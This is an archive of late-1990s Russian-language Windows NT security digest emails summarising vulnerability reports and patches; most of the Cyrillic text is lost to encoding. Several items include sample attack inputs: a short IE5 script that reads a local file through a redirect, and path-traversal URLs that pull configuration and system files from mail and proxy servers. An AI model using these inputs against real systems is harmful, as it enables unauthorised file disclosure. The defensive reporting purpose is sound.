http://support.microsoft.com/support/kb/articles/q239/1/05.asp
http://support.microsoft.com/support/kb/articles/Q172/7/33.asp
http://support.microsoft.com/support/kb/articles/Q141/7/96.asp

4.  IE5

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
     MS99-040,   
   IE5    Active Scripting.

http://www.microsoft.com/security/bulletins/MS99-040.asp
http://www.microsoft.com/security/bulletins/MS99-040faq.asp



http://windowsupdate.microsoft.com
http://www.microsoft.com/msdownload/iebuild/dlbhav/en/dlbhav.htm

   

http://support.microsoft.com/support/kb/articles/Q242/5/42.asp

5. ShieldsUP

Steve Gibson,  SpinRite,      
   Windows - ShieldsUP.

http://grc.com

6.     

Ben Nagy <bnagy@cpms.com.au> (ntsecurity, iss)    , 
  ,       

http://www.bahnhof.se/~winnt/toolbox/

7.    Netscape 4.7

Max Vision <vision@WHITEHATS.COM> (ntbugtraq)    
   Netscape 4.61  4.7  NT 4.0.   
    

http://www.whitehats.com/browsers/maxvisioncrash47/index.html


From rudnyi Mon Nov  1 12:41:51 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id MAA10660
	for rudnyi@comp.chem.msu.su; Mon, 1 Nov 1999 12:41:51 +0300 (MSK)
Date: Mon, 1 Nov 1999 12:41:51 +0300 (MSK)
Message-Id: <199911010941.MAA10660@comp.chem.msu.su>
Subject: digest 22-28.10.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

22 - 28  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.  SP6

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)    SP6

http://www.microsoft.com/ntserver/nts/downloads/recommended/
PREM_SP6/allSP6.asp

Russ ,   

http://www.microsoft.com/ntserver/nts/downloads/recommended/PREM_SP6/
updpdates.asp

SP6     "must apply".

2. Java VM

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)    
    Microsoft's Virtual Machine Verifier  IE 4.0  5.0,  
  14  1999 Gary McGraw  Reliable Software 
Technologies

http://www.securityfocus.com/templates/archive.pike?list=1&date=1999-10-
8&msg=3805E4CC.76D5992B@rstcorp.com

   ,   
.      
 .

http://www.microsoft.com/security/bulletins/MS99-045.asp
http://www.microsoft.com/security/bulletins/MS99-045faq.asp
http://support.microsoft.com/support/kb/articles/q244/2/83.asp



http://www.microsoft.com/java/vm/dl_vm32.htm

3. TCP ISN

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)    
 ,  TCP Initial Sequence Number.

SP4    TCP ISN,  ,   , 
  ,      .

http://www.microsoft.com/security/bulletins/MS99-046.asp
http://www.microsoft.com/security/bulletins/MS99-046faq.asp
http://support.microsoft.com/support/kb/articles/q243/8/35.asp



http://download.microsoft.com/download/winntsrv40/patch/4.0.1381.7014/nt4/
en-us/q243835.exe

Russ   FAQ,      
  ,   ,   ISN.    
  ,    

http://tardis.svsu.edu/~slaven/Entropy.html
ftp://ftp.isi.edu/in-notes/rfc793.txt

 ,      SP6.

 Gary Kessler <gkessler@SYMQUEST.COM> (ntbugtraq) , 
  FAQ    .

 Microsoft Product Security Response Team 
<secure@MICROSOFT.COM> ,  FAQ    
 , ,  , ,   ,  
 .

4.  DoS LSA

Mihnea Mironescu <MihneaM@PAPASTRATOS.RO> (ntbugtraq) , 
      LSA -   
 NT 4.0 SP5     SP5,  LSA3-fix. 
      NAI's CyberCop Scanner.

Karl Bolingbroke <karl.bolingbroke@FLYINGJ.COM> (ntbugtraq)  
 ,    LSA.

1-   #1  NT 4.0, SP5.
2-       #1  
 NTLMv2:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\
LMCompatibilityLevel=3

3-   #2  NT 4.0, SP4  SP5.
4-   #2,     ,  ,   
.
5-   #1       #2.
6-   #2   LSASS.

     

http://support.microsoft.com/support/kb/articles/q236/4/14.ASP

     .

5.    IE5  
 

Francis Favorini <francis.favorini@DUKE.EDU> (ntbugtraq) ,  
   IFRAME ExecCommand   MS9-042 
  ,  Georgi Guninski    
  .     
 

http://www.nat.bg/~joro/read2.html

 Microsoft Product Security Response Team 
<secure@MICROSOFT.COM> (ntbugtraq)  .  
     .

6.   Netscape Messaging Server 3.6  
SP2

WINSA@LISTSERV.NTSECURITY.NET     Netscape 
Messaging Server 3.6  SP2.     

http://www.ntsecurity.net/go/load.asp?iD=/security/netscp-msg-srv.htm



From rudnyi Tue Nov  9 10:09:29 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA22152
	for rudnyi@comp.chem.msu.su; Tue, 9 Nov 1999 10:09:29 +0300 (MSK)
Date: Tue, 9 Nov 1999 10:09:29 +0300 (MSK)
Message-Id: <199911090709.KAA22152@comp.chem.msu.su>
Subject: digest 29.10-4.11.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

29  - 4  1999 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.   Win2KSecAdvice

WinSA Publisher <winsa@NTSECURITY.NET>    
  ,   Windows NT. 
   Steve Manzuik.

   

http://www.ntsecurity.net/scripts/load.asp?iD=/security/subscribe-ntsd1.htm

      listserv@listserv.ntsecurity.net

subscribe Win2KSecAdvice anonymous

2.  RFPoison  services.exe

".rain.forest.puppy." <rfp@wiretrip.net> (ntbugtraq)   "  
"  services.exe.       
  ,  ,      
,     ,  , 
   ,  ..

-    http://www.wiretrip.net/rfp/

3.   

eEye - Digital Security Team <eeye@EEYE.COM> (ntbugtraq)  
,     Windows NT. -  
   Windows NT Spooler (Spoolss.exe)   
    System.

     

http://www.eeye.com/html/Advisories/spoolsploit.zip

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
  ,   

<http://www.microsoft.com/security/bulletins/MS99-047.asp>
<http://www.microsoft.com/security/bulletins/MS99-047faq.asp>
<http://support.microsoft.com/support/kb/articles/q243/6/49.asp>



http://download.microsoft.com/download/winntsrv40/Patch/Spooler-
fix/NT4/EN-US/Q243649.exe

4.   IE5 

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
    MS99-042     
 IE5.

http://www.microsoft.com/security/bulletins/ms99-042.asp

5. Redirect     
  IE5

Georgi Guninski [mailto:joro@nat.bg] (Win2KSecAdvice)    
     .     
  .

      .

<SCRIPT>
alert("Create short text file c:\\test.txt and it will be read and shown
in a message box");
a=window.open("http://www.nat.bg/~joro/reject.cgi?test.txt");
b=a.document;
setTimeout("alert(b.body.innerText);",4000);
</SCRIPT>
// "http://www.nat.bg/~joro/reject.cgi?test.txt" just does a HTTP
redirect to: "file://c:/test.txt"

    

http://www.nat.bg/~joro/msredir1.html

 -  Active Scripting.

6. SCSI     
  Windows NT

Eric Gisin <ericg@TECHIE.COM> (ntbugtraq)  ,   
SCSI (\\.\SCSI#:),         
,  ,    ,     
( \\.\PhysicalDrive#  \\.\X:). 

Microsoft Product Security Response Team <secure@MICROSOFT.COM> 
(ntbugtraq) ,        
,      , 
   SCSI,   
.

Federico Bianchi <bianchi@WWW.ARTE.UNIPI.IT> (ntbugtraq) ,  
     http://www.sysinternals.com   
"Device Object Security".

Tim Southerwood <T.Southerwood@SURREY.AC.UK> (ntbugtraq) , 
        

http://www.sysinternals.com/winobj.htm

7.  "ase Sensitivity"  SP5

Microsoft Product Security Response Team <secure@MICROSOFT.COM> 
(ntbugtraq) ,     SP5  SP6   
.  "ase Sensitivity"     
 ,      .   
    

hkey_local_machine\system\CurrentControlSet\Control\Session
Manager\ProtectionMode

 ,     

http://support.microsoft.com/support/kb/articles/Q218/4/73.ASP

8.    IIS  
 MDAC

Mark <mark@NTSHOP.NET> (Win2KSecAdvice)   
CERT  ,    IIS   MDAC   
.

      1998   ,   
  IIS  -  .

Marc <Marc@EEYE.COM> (Win2KSecAdvice) ,   
   ,    ,  
 ,     msadc.pl  
- .

".rain.forest.puppy." <rfp@WIRETRIP.NET> http://www.wiretrip.net/rfp/ 
(Win2KSecAdvice) ( msadc.pl)    
  ,      
    ,   .

- Office 97/Jet 3.5 update binary (i386)
  http://www.wiretrip.net/rfp/bins/msadc/jetcopkg.exe
  http://officeupdate.microsoft.com/isapi/gooffupd.asp
        ?TARGET=/downloaditems/JetCopkg.exe

- Microsoft Universal Data Access homepage
  http://www.microsoft.com/data/

- MDAC 2.1.2.4202.3 (GA) (aka MDAC 2.1 sp2) update (i386)
  http://www.wiretrip.net/rfp/bins/msadc/mdac_typ.exe
  http://www.microsoft.com/data/download_21242023.htm

- MDAC 2.1.1.3711.11 (GA) (aka MDAC 2.1 sp1) hotfix
  http://www.microsoft.com/data/download/jetODBC.exe

- MDAC 2.1 release manifest
  http://www.microsoft.com/data/MDAC21info/MDAC21sp2manifest.htm

- MDAC 2.1 installation FAQ
  http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm

- Security Implications of RDS 1.5, IIS 3.0 or 4.0, and ODBC
  http://support.microsoft.com/support/kb/articles/q184/3/75.asp

- Unauthorized ODBC Data Access with IIS and RDS (MS99-004)
  http://www.microsoft.com/security/bulletins/ms98-004.asp

- Re-release of MS99-004 (MS99-025)
  http://www.microsoft.com/security/bulletins/ms99-025.asp

- MS99-025 FAQ (best explanation of problem by Microsoft)
  http://www.microsoft.com/security/bulletins/MS99-025faq.asp

- MS99-30: Patch available for Office ODBC Vulnerabilities
  http://www.microsoft.com/security/bulletins/ms99-030.asp

- Jet Expression Can Execute Unsafe VBA Functions
  http://support.microsoft.com/support/kb/articles/q239/1/04.asp

- Implementing Custom Handlers in RDS 2.0
  http://www.microsoft.com/Data/ado/rds/custhand.htm

- Handsafe registry patch (enables handlers)
  http://www.wiretrip.net/rfp/bins/msadc/handsafe.exe
  http://www.microsoft.com/security/bulletins/handsafe.exe

- RFP9901: NT ODBC remote compromise
  http://www.wiretrip.net/rfp/p/doc.asp?id=3&iface=2

- RFP9902: RDS/IIS 4.0 vulnerability and exploit
  http://www.wiretrip.net/rfp/p/doc.asp?id=1&iface=2

- RDS exploit (msadc.pl v1 and v2)
  http://www.wiretrip.net/rfp/p/doc.asp?id=16&iface=2

- ULG recommended fix on OSALL
  http://www.aviary-mag.com/News/Powerful_Exploit/ULG_Fix/ulg_fix.html

- CERT blurb
  http://www.cert.org/current/current_activity.html#0

- Attrition mirror of defaced websites (patch or you'll be on it!)
  http://www.attrition.org/mirror/attrition/

9.    

Luciano Martins <luck@USSRBACK.COM> www.USSRBACK.COM 
(ntbugtraq) ,   ExpressFS 2.x FTP Server  
 ,        "  
",         .

Luciano Martins <luck@USSRBACK.COM> www.USSRBACK.COM 
(ntbugtraq) ,   CMail SMTP Server Version 2.4,    Avirt 
Mail Server 3.3a  3.5    ,  
      .

dark spyrit <dspyrit@BEAVUH.ORG> (ntbugtraq) ,    
Avirt 3.5 (NT)     http://www.beavuh.org.

Ussr Labs <labs@USSRBACK.COM> (ntbugtraq)    
  BFTelnet Server v1.1.

dark spyrit <dspyrit@BEAVUH.ORG> (ntbugtraq)    
  RealNetworks RealServer G2.     
http://www.beavuh.org.

10.   

Ussr Labs <labs@USSRBACK.COM> (ntbugtraq) ,   Eserv 2.50 
Web interface Server  FTGate Version 2.1 Web interface   
  

http://127.1:3128/../../../conf/Eserv.ini
http://127.1:8080/../../../autoexec.bat



From rudnyi Fri Nov 26 17:42:24 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id RAA01809
	for rudnyi@comp.chem.msu.su; Fri, 26 Nov 1999 17:42:23 +0300 (MSK)
Date: Fri, 26 Nov 1999 17:42:23 +0300 (MSK)
Message-Id: <199911261442.RAA01809@comp.chem.msu.su>
Subject: digest 5-19.11.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

5  19  1999 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1. Malformed Spooler Request

 Microsoft Product Security Response Team 
<secure@MICROSOFT.COM> (ntbugtraq) ,  , 
   

http://www.microsoft.com/Security/Bulletins/ms99-
047.asp

   Windows NT 4.0 Service Packs 4, 5  6.

2.     IIS 4

Jason Levine's List Subscription <jlists@SIPHOTO.COM> (ntbugtraq) , 
 IIS 4       FTP. 
    

http://develop.queso.com/iisftplogbug.html.

3.   SP6

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   
,    SP6.

1) SP6   Lotus Notes server (http://home.cnet.com/category/0-
1003-200-1439342.html)

2)  winspool.drv  SP6     
.

3)     Winsock  
  
(http://support.microsoft.com/support/kb/articles/Q245/6/78.asp).

4.   

dark spyrit <dspyrit@BEAVUH.ORG> (ntbugtraq) ,    
Interscan VirusWall NT 3.23/3.3  ,    
,       . 
      http://www.beavuh.org.

Ussr Labs <labs@USSRBACK.COM> (ntbugtraq) ,   
 TransSoft's Broker Ftp Server v3.5, QVT/Term 'Plus' 4.2d FTP 
Server, XtraMail v1.11, NetCPlus SmartServer3 POP 3.51.1, ZetaMail 2.1 Mail 
POP3/SMTP  ,    .  
     http://www.ussrback.com/.



From rudnyi Sat Nov 27 16:46:06 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id QAA14738
	for rudnyi@comp.chem.msu.su; Sat, 27 Nov 1999 16:46:05 +0300 (MSK)
Date: Sat, 27 Nov 1999 16:46:05 +0300 (MSK)
Message-Id: <199911271346.QAA14738@comp.chem.msu.su>
Subject: digest 19-25.11.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

19  25  1999 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.  SP6a

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
  SP6a.    

http://ntbugtraq.ntadvice.com/sp6a.asp
http://www.ntsecurity.net/go/2c.asp?f=/news.asp?IDF=180&TB=news

2. IE5

Georgi Guninski <joro@nat.bg> (Win2KsecAdvice)     
IE5,    HTTP   XML.  
 Active Scripting   Script ActiveX Controls, 
 Safe for Scripting.    

http://www.nat.bg/~joro/xmln.html

3.  FTP

"Dmitri A. Doulepov" <dima@MERLIN.SAMSUNG.RU> (ntbugtraq)  
     FTP-  IIS 4.

1.    FTP   /User1  /User2.
2.   :
        a.  EVERYONE
        b. :
            /User1:
                User1: Change
                SYSTEM:    Change
            /User2
                User2: Change
                SYSTEM:    Change
3.   User1.   "cd /User2".     
 /User2    "dir".

  SYSTEM     /User2,   
      "Access is denied".  
 ,  IIS      /User2  
 SYSTEM,     User1.

4.    W95

Martin Kay <mkay@ORBISGROUP.COM.AU> (ntbugtraq) ,  
  Windows 95     ,   
  .

Shawn Wright <swright@SLS.BC.CA> (ntbugtraq)  
 ,  ,   ,   
    .

5.    HTTP

Philip Stoev <philip@EINET.BG> (ntbugtraq)   ,  
      HTTP. 

http://phiphi.hypermart.net

6.   

Ussr Labs <labs@USSRBACK.COM> (ntbugtraq) ,   
 Vermillion FTP Daemon, MDaemon Server v2.8.5.0, WorldClient 
Server v2.0.0.0, BisonWare FTP Server V3.5  ,   
 .       
http://www.ussrback.com/.

Mark Frieden <mfrieden@ARIZONA.EDU> (ntbugtraq) ,  
     APC PowerChute Plus 5.1 NT   
 IRC,  PowerChute       
 (6667  6668),   IRC.



From rudnyi Sat Dec  4 17:25:20 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id RAA24520
	for rudnyi@comp.chem.msu.su; Sat, 4 Dec 1999 17:25:20 +0300 (MSK)
Date: Sat, 4 Dec 1999 17:25:20 +0300 (MSK)
Message-Id: <199912041425.RAA24520@comp.chem.msu.su>
Subject: digest 26.11-2.12.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

26  - 2  1999 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1. NT   C2

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,  Windows NT 4.0 
SP6a +  "C2 Update"    C2  
 .

- - Server operating as a primary domain controller
- - Server operating as a backup domain controller
- - Server operating as a member server
- - Server operating as a non-member server
- - Workstation as a domain member
- - Workstation as a non-domain member

http://www.microsoft.com/security/issues/C2Evaluation.asp

2. GetAdmin   NT Task 
Scheduler

Arne Vidstrom <arne.vidstrom@NTSECURITY.NU> (ntbugtraq)  
   Task Scheduler Internet Explorer 5,   
      
.

 -   Internet Explorer 5.01,    . 
:

http://ntsecurity.nu/advisories/a11.shtml

http://www.microsoft.com/Security/Bulletins/ms99-051.asp
http://www.microsoft.com/security/bulletins/MS99-051faq.asp

3. SP6a

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)    
,   ,    40- SP6a  
  SP6.

    ,     40- 
SP6a   ,   ,      
.

       

http://www.microsoft.com/ntserver/support/faqs/SP6faq.asp

4. NTInfoScan

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq)   
    NTInfoScan   
Cerberus Internet Scanner

http://www.cerberus-infosec.co.uk/

5.  

MJE <mark@NTSHOP.NET> (Win2KsecAdvice)     
 .

   .       
   -  IE 5 (Web Proxy Auto-
Discovery). 

   IE 5.01

http://www.microsoft.com/windows/ie/download/all.htm?bShowPage
http://www.microsoft.com/msdownload/iebuild/
ie501_win32/en/ie501_win32.htm

  

http://www.microsoft.com/security/bulletins/ms99-054faq.asp.
http://support.microsoft.com/support/kb/articles/q247/7/33.asp.
http://ietf.org/internet-drafts/draft-ietf-wrec-wpad-01.txt.

     SSL ISAPI ,    
IIS   .       SSL 
     .

http://www.microsoft.com/security/bulletins/MS99-053faq.asp.
http://support.microsoft.com/support/kb/articles/q244/6/13.asp.

6.    

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)  ,   
     Zipped_Files.exe  
Link.vbs,      .

7.   

Ussr Labs <labs@USSRBACK.COM> (ntbugtraq) (Win2KsecAdvice) 
    NT.    , 
     WorldClient Server v2.0.0.0, Serv-U 
FTP-Server v2.5a.      
http://www.ussrback.com/.

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) ,   
    %5f   Oracle Web 
Listener  ,     . 
, 

http://host/ows-bin/owa/owa_util.signature -  
http://host/ows-bin/owa/owa_util%2esignature -  .


From rudnyi Sat Dec 18 10:28:55 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA07199
	for rudnyi@comp.chem.msu.su; Sat, 18 Dec 1999 10:28:55 +0300 (MSK)
Date: Sat, 18 Dec 1999 10:28:55 +0300 (MSK)
Message-Id: <199912180728.KAA07199@comp.chem.msu.su>
Subject: digest 3-16.12.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

3 - 16  1999 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1. SYSKEY   

BindView Security Advisory <advisory+syskey@BOS.BINDVIEW.COM> 
(ntbugtraq)  ,   SYSKEY,

,     Syskey    
,      ,  
Syskey.    ,       
www.ntbugtraq.com.

:    

http://www.microsoft.com/security/bulletins/ms99-056.asp
http://support.microsoft.com/support/kb/articles/q248/1/83.asp

2.    LSA

 NAI Labs <seclabs@NAI.COM> (ntbugtraq) ,   
,      "  "  LSA.

     http://www.nai.com.

:    .

http://www.microsoft.com/security/bulletins/ms99-057.asp
ttp://support.microsoft.com/support/kb/articles/q248/1/85.asp

3.   SUBST

Dave Tarbatt - ACS <D.A.Tarbatt@BOLTON.AC.UK> (ntbugtraq) , 
    subst   
        
.

.     

SUBST M: C:\TEMP

   .         
M:.

Forster, Jacques" <Jacques.Forster@COMPAQ.COM> (ntbugtraq)  
,       subst .

@echo off

:: This script removes all currently allocated SUBST 
drives.
:: Supports NT4 and Windows 2000.

if not exist %temp%\nul set temp=%systemdrive%\temp
if not exist %temp%\nul md %systemdrive%\temp
if not exist %temp%\nul set temp=%systemdrive%\

set log=%temp%\Remove_Subst_Drives.log
set sysdir=%systemroot%\system32
if not exist %sysdir%\subst.exe goto error1

echo ---------------   START   --------------           
>%log%
time /t                                                 
>>%log%
echo ----------------------------------------           
>>%log%

:start
echo ----------------------------------------           
>>%log%
%sysdir%\subst.exe                                      
>%temp%\subst.txt

echo Analysing %temp%\Subst.txt ...                     
>>%log%
For /F "tokens=1,2* delims=\" %%i in ('type 
%temp%\subst.txt') do call %sysdir%\subst.exe %%i /d
goto end

:error1
echo ----------------------------------------           
>>%log%
echo Missing SUBST.EXE command ...                      
>>%log%
goto end

:end
if exist %temp%\subst.txt del %temp%\subst.txt
echo ---------------    END    --------------           
>>%log%
time /t                                                 
>>%log%
echo ----------------------------------------           
>>%log%
pause

4.    IE5

Jeremy Kothe <paceflow@HOTMAIL.COM> (ntbugtraq) ,  
 

vnd.ms.radio:\\aaaaaaaaaaa....

     IE5,     
  .

   ,       
www.ntbugraq.com,     .

5.   SA  SQL 7.0

kbelian [mailto:kbelian@business-soft.com] (Win2KsecAdvice) ,  
    read/write     SQL 
7.0,   SQL ,       
 SQL 7.0.

6.   

 Ussr Labs <labs@USSRBACK.COM> (ntbugtraq) ,  
Symantec Mail-Gear 1.0 Web interface Server   

http://ServerIp:8003/Display?what=../../../../../autoexec.bat

    Symantec Mail-Gear 1.1.

     ,   
    .   

http://www.ussrback.com


From rudnyi Sat Dec 25 15:31:29 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id PAA09760
	for rudnyi@comp.chem.msu.su; Sat, 25 Dec 1999 15:31:28 +0300 (MSK)
Date: Sat, 25 Dec 1999 15:31:28 +0300 (MSK)
Message-Id: <199912251231.PAA09760@comp.chem.msu.su>
Subject: digest 17-23.12.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

17 - 23  1999 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.	 SQL 7

 Microsoft Product Security <secnotif@MICROSOFT.COM> 
(win2ksecadvice)  ,    
  ɻ  SQL 7 Server   
  TDS.

http://www.microsoft.com/security/bulletins/MS99-059faq.asp.
http://support.microsoft.com/support/kb/articles/q248/7/49.asp 
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16923

2.	   IIS

 Microsoft Product Security <secnotif@MICROSOFT.COM> 
(win2ksecadvice)   ,    IIS.  
 ,     , 
  RFC 1738    ,  , 
  IIS,     .

http://www.microsoft.com/security/bulletins/MS99-061faq.asp
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16357
http://support.microsoft.com/support/kb/articles/q246/4/01.asp
http://www.ietf.org/rfc/rfc1738.txt

    .    
       .asp    
  .

http://www.microsoft.com/security/bulletins/MS99-058faq.asp
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16378
http://support.microsoft.com/support/kb/articles/q238/6/06.asp 
http://support.microsoft.com/support/kb/articles/q186/8/03.asp

3.	   IE 5.01

Georgi Guninski <joro@NAT.BG> (win2ksecadvice)   
    IE 5.01,     
     .   

http://www.nat.bg/~joro/navan.html

4.	   L0phtCrack

Weld Pond <weld@L0PHT.COM> (ntbugtraq) ,   - 
   Trend Micro  NAI ,  
L0phtCrack   - "The file l0phtcrack.XXX on YYY is infected 
with the virus Lophtcrack. Unable to clean file.".    
.

5.	    
\RECYCLED

Neil Bortnak (ntbugtraq) ,     
 W95/NT    \RECYCLED,     
    ,     .

6.	   MS Access

"C. R. Messina" <crmessina@SPIDERLINK.NET> (ntbugtraq) , 
        Access   
,

drive:\pathtoaccess\msaccess.exe [280+ 'overflow character']

    ,    .

7.	      
 

Dan Ritter <Dan.Ritter@DAL.FRB.ORG> (ntbugtraq) ,    
 pwdump2          
PDC,     ,     ,    
   .    
,        NT 
       .

Luke Kenneth Casson Leighton <lkcl@SAMBA.ORG> ,   
       .

8.	  

 Ussr Labs <labs@USSRBACK.COM> (ntbugtraq)    
    DNS PRO v5.7 WinNT.   
  http://www.ussrback.com.     , 
     ZBServer 1.5 Pro Edition for 
Win98/NT.

darkplan <darkplan@OCEANFREE.NET> (ntbugtraq)  , 
   ,  Netscape Navigator/Communicator 4.5. 
      .   
   ,    www.ntbugtraq.com.


From rudnyi Mon Jan 10 10:11:59 2000
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA24407
	for rudnyi@comp.chem.msu.su; Mon, 10 Jan 2000 10:11:59 +0300 (MSK)
Date: Mon, 10 Jan 2000 10:11:59 +0300 (MSK)
Message-Id: <200001100711.KAA24407@comp.chem.msu.su>
Subject: digest 24.12.99-6.1.2000
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 2000,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

24  1999  - 6  2000 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.  CERT   "  
"

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
CERT

http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html

         
"  " TFN2K     .

2.  

jdglaser <jdglaser@NTOBJECTIVES.COM> (ntbugtraq) ,  
 VisualLast     
(http://www.ntobjectives.com)     14  2000.

3.   Commercial  Internet System 
(MCIS) Mail server

 Microsoft Product Security <secnotif@MICROSOFT.COM> 
(ntbugtraq)    ,    
Microsoft(r) Commercial  Internet System (MCIS) Mail server.

http://www.microsoft.com/security/bulletins/00/MS00-001faq.asp.
http://support.microsoft.com/support/kb/articles/q246/7/31.asp

4. SMS 2.0 Remote Control

Frank Monroe <Frank.Monroe@AMMOBILE.COM> (Win2KSecAdvice) 
,    SMS 2.0 Remote Control   
    ,    
     . ,   
 

%SMS_LOCAL_DIR%\MS\SMS\CLICOMP\REMCTRL\WUSER32.EXE

  .      
 .

 -       .

5.   MS99-061

".rain.forest.puppy." <rfp@WIRETRIP.NET>, www.wiretrip.net/rfp/ 
(Win2KSecAdvice)  ,     
 ,     MS99-061.  
,      IIS   '%1?',  '?' -  
    ,  IIS      
.

87 -> 0         137 -> i
88 -> 1         138 -> j
89 -> 2         139 -> k
90 -> 3         140 -> l
91 -> 4         141 -> m
92 -> 5         142 -> n
93 -> 6         143 -> o
94 -> 7         144 -> p
95 -> 8         145 -> q
96 -> 9         146 -> r
129 -> a        147 -> s
130 -> b        148 -> t
131 -> c        149 -> u
132 -> d        150 -> v
133 -> e        151 -> w
134 -> f        152 -> x
135 -> g        153 -> y
136 -> h        154 -> z

 ,      'default.asp'  
 ,    .

6.   

Ussr Labs <labs@USSRBACK.COM> (ntbugtraq) (Win2KSecAdvice) 
    .   
  Rover POP3 Server V1.1 NT From aVirt, Savant Web Server V2.0 
WIN9X / NT / 2K, CSM Mail Server v.2000.08.A, CamShot WebCam HTTP 
Server v2.5, AnalogX SimpleServer:WWW HTTP Server v1.1, IMail 
IMONITOR Server for WinNT Version 5.08.

   

http://www.ussrback.com/
http://www.w00w00.org/advisories.html



From rudnyi Sat Jan 15 16:08:51 2000
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id QAA14438
	for rudnyi@comp.chem.msu.su; Sat, 15 Jan 2000 16:08:50 +0300 (MSK)
Date: Sat, 15 Jan 2000 16:08:50 +0300 (MSK)
Message-Id: <200001151308.QAA14438@comp.chem.msu.su>
Subject: digest 7-13.1.2000
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 2000,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

7 - 13  2000 

        
ntbugtraq, ntsecurity (iss)  Win2KSecAdvice (w2k) (  
 - http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.  GetAdmin

 BindView Security Advisory 
<advisory+imposter@BOS.BINDVIEW.COM> (ntbugtraq)  
   NtImpersonateClientOfPort,    
     .

 -    .

.

http://www.microsoft.com/Security/Bulletins/ms00-003.asp
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17382
http://support.microsoft.com/support/kb/articles/q247/8/69.asp

 Undocumented Windows NT, ISBN# 0-7645-4569-8, Chapter 8.

  ,       www.ntbugtraq.com, 
     .

2. IE5

Georgi Guninski <joro@NAT.BG> (Win2KsecAdvice)    
  IE5,         
.    

http://www.nat.bg/~joro/img2main.html

3.    NT

 "Internet Security with Windows NT"    

http://www.ntsecurity.net/book

Luke Kenneth Casson Leighton <lkcl@SAMBA.ORG> (ntbugtraq) , 
